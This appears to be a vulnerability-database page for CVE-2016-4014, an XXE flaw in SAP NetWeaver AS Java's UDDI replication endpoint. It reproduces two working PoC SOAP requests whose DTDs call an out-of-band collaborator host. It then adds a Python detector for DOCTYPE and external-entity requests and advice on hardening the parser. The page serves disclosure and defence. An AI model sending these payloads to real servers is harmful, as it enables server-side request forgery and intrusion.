Related vulnerability
Title:
SAP NetWeaver AS JAVA UDDI component XML External Entity vulnerability
(CVE-2016-4014)
Description: SAP NetWeaver is a service-oriented, integrated application platform from the German company SAP; it provides the development and runtime environment for SAP applications. SAP NetWeaver AS (Application Server) Java is a Java-based application server that runs on NetWeaver. UDDI is one of its components, a directory service for registering and searching Web services. The UDDI component of SAP NetWeaver AS JAVA 7.4 contains an XML External Entity vulnerability. A remote attacker can exploit it by sending a crafted XML request to cause a denial of service.
Description
[CVE-2016-4014] SAP Netweaver AS JAVA UDDI Component XML External Entity (XXE)
Introduction
<b>[CVE-2016-4014] SAP Netweaver JAVA AS UDDI Component XXE</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
```
POST /uddi/api/replication HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://xyzabcdefhjkl.burpcollaborator.net/ssrf">
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header />
<SOAP-ENV:Body>
<do_ping>
<authInfo />
<findQualifiers>
<findQualifier>FINDQUALIFIER</findQualifier>
</findQualifiers>
<tModelBag>
<tModelKey>asd</tModelKey>
</tModelBag>
</do_ping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
```
POST /uddi/api/replication HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://xyzabcdefhjkl.burpcollaborator.net/">
%external;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header />
<SOAP-ENV:Body>
<do_ping>
<authInfo />
<findQualifiers>
<findQualifier>FINDQUALIFIER</findQualifier>
</findQualifiers>
<tModelBag>
<tModelKey>asd</tModelKey>
</tModelBag>
</do_ping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
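The two requests above differ only in how the DTD pulls in an external resource: the first names an external DTD directly in the DOCTYPE (PUBLIC identifier plus URI), the second declares a parameter entity with a SYSTEM URI and dereferences it inside the internal subset. Both are things a SOAP endpoint such as `/uddi/api/replication` never legitimately needs, so a DOCTYPE in the request body is by itself a strong detection signal. The following Python script is an added example (not part of the original PoC or of SAP's code) that inspects raw HTTP requests, as a WAF rule, a log-review script or a proxy plugin would: it splits headers from body, extracts the full DOCTYPE declaration including its internal subset, and reports external DTD references, external (parameter or general) entity declarations, parameter-entity references and any URIs they carry. The sample requests are constructed to mirror the shape of the PoC; `collaborator.example` is a placeholder hostname.

```python
import re
from typing import Dict, Optional, Tuple

# --- request parsing -------------------------------------------------------

def split_http_request(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:  # tolerate requests captured with bare LF line endings
        head, sep, body = raw.partition("\n\n")
    lines = head.splitlines()
    request_line = lines[0] if lines else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def extract_doctype(body: str) -> Optional[str]:
    """Return the complete <!DOCTYPE ...> declaration, or None if the body has none.

    A naive regex up to the first '>' would stop inside the internal subset
    (the '>' that closes an <!ENTITY ...> declaration), so we track quotes and
    the [ ... ] subset explicitly.
    """
    start = body.find("<!DOCTYPE")
    if start < 0:
        return None
    in_quote: Optional[str] = None
    in_subset = False
    for i in range(start, len(body)):
        ch = body[i]
        if in_quote:
            if ch == in_quote:
                in_quote = None
            continue
        if ch in ('"', "'"):
            in_quote = ch
        elif ch == "[":
            in_subset = True
        elif ch == "]":
            in_subset = False
        elif ch == ">" and not in_subset:
            return body[start:i + 1]
    return body[start:]  # unterminated declaration: report what is there


# --- detection -------------------------------------------------------------

EXTERNAL_ID_RE = re.compile(r"\b(SYSTEM|PUBLIC)\b")
ENTITY_DECL_RE = re.compile(r"<!ENTITY\s+(%\s*)?(\w+)\s+(SYSTEM|PUBLIC)\b")
PARAM_REF_RE = re.compile(r"%(\w+);")
URI_RE = re.compile(r"\b(?:https?|ftp|file|jar|gopher):[^\s\"'>]+")


def inspect_request(raw: str) -> dict:
    """Inspect one raw HTTP request and describe any DTD-based external references."""
    request_line, headers, body = split_http_request(raw)
    parts = request_line.split()
    result = {
        "path": parts[1] if len(parts) > 1 else "",
        "is_xml": "xml" in headers.get("content-type", "").lower(),
        "doctype": False,
        "alerts": [],
        "urls": [],
    }
    if not result["is_xml"] and not body.lstrip().startswith("<?xml"):
        return result
    doctype = extract_doctype(body)
    if doctype is None:
        return result
    result["doctype"] = True
    result["alerts"].append("DOCTYPE declaration present")
    # The part before '[' is the DOCTYPE header: <!DOCTYPE name SYSTEM "uri"> or PUBLIC "id" "uri"
    header = doctype.split("[", 1)[0]
    if EXTERNAL_ID_RE.search(header):
        result["alerts"].append("external DTD referenced in DOCTYPE")
    for m in ENTITY_DECL_RE.finditer(doctype):
        kind = "parameter" if m.group(1) else "general"
        result["alerts"].append(f"external {kind} entity '{m.group(2)}' declared")
    for name in PARAM_REF_RE.findall(doctype):
        result["alerts"].append(f"parameter entity reference %{name}; in internal subset")
    result["urls"] = URI_RE.findall(doctype)
    return result


def severity(result: dict) -> str:
    """none: no DOCTYPE; medium: DOCTYPE only; high: external reference or parameter entity."""
    if not result["doctype"]:
        return "none"
    if len(result["alerts"]) > 1 or result["urls"]:
        return "high"
    return "medium"


# --- constructed samples (shape of the PoC; hostnames are placeholders) -------

SOAP_BODY = (
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    "<SOAP-ENV:Body><do_ping><authInfo/></do_ping></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)


def build_request(body: str) -> str:
    headers = [
        "POST /uddi/api/replication HTTP/1.1",
        "Host: host",
        "Content-Type: text/xml;charset=UTF-8",
        f"Content-Length: {len(body.encode())}",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


SAMPLE_EXTERNAL_DTD = build_request(
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://collaborator.example/ssrf">\n'
    + SOAP_BODY
)
SAMPLE_PARAM_ENTITY = build_request(
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE update [\n<!ENTITY % external SYSTEM "http://collaborator.example/">\n%external;]>\n'
    + SOAP_BODY
)
SAMPLE_BENIGN = build_request('<?xml version="1.0" encoding="utf-8"?>\n' + SOAP_BODY)

if __name__ == "__main__":
    for label, raw in (("external DTD", SAMPLE_EXTERNAL_DTD),
                       ("parameter entity", SAMPLE_PARAM_ENTITY),
                       ("benign", SAMPLE_BENIGN)):
        r = inspect_request(raw)
        print(f"{label}: severity={severity(r)} path={r['path']} alerts={r['alerts']} urls={r['urls']}")
```

Detection at the edge is a compensating control only; the fix belongs in the parser. For a Java service the equivalent hardening is to configure the XML parser to reject DOCTYPE declarations entirely (or, where DTDs cannot be refused, to disable external general and parameter entities and external DTD loading), which removes both variants above at once, and to apply the vendor patch for CVE-2016-4014.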
File snapshot
[4.0K] /data/pocs/a93785df4caa239ffc47e0dac17b4f584f00e424
└── [1.8K] README.md
0 directories, 1 file
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.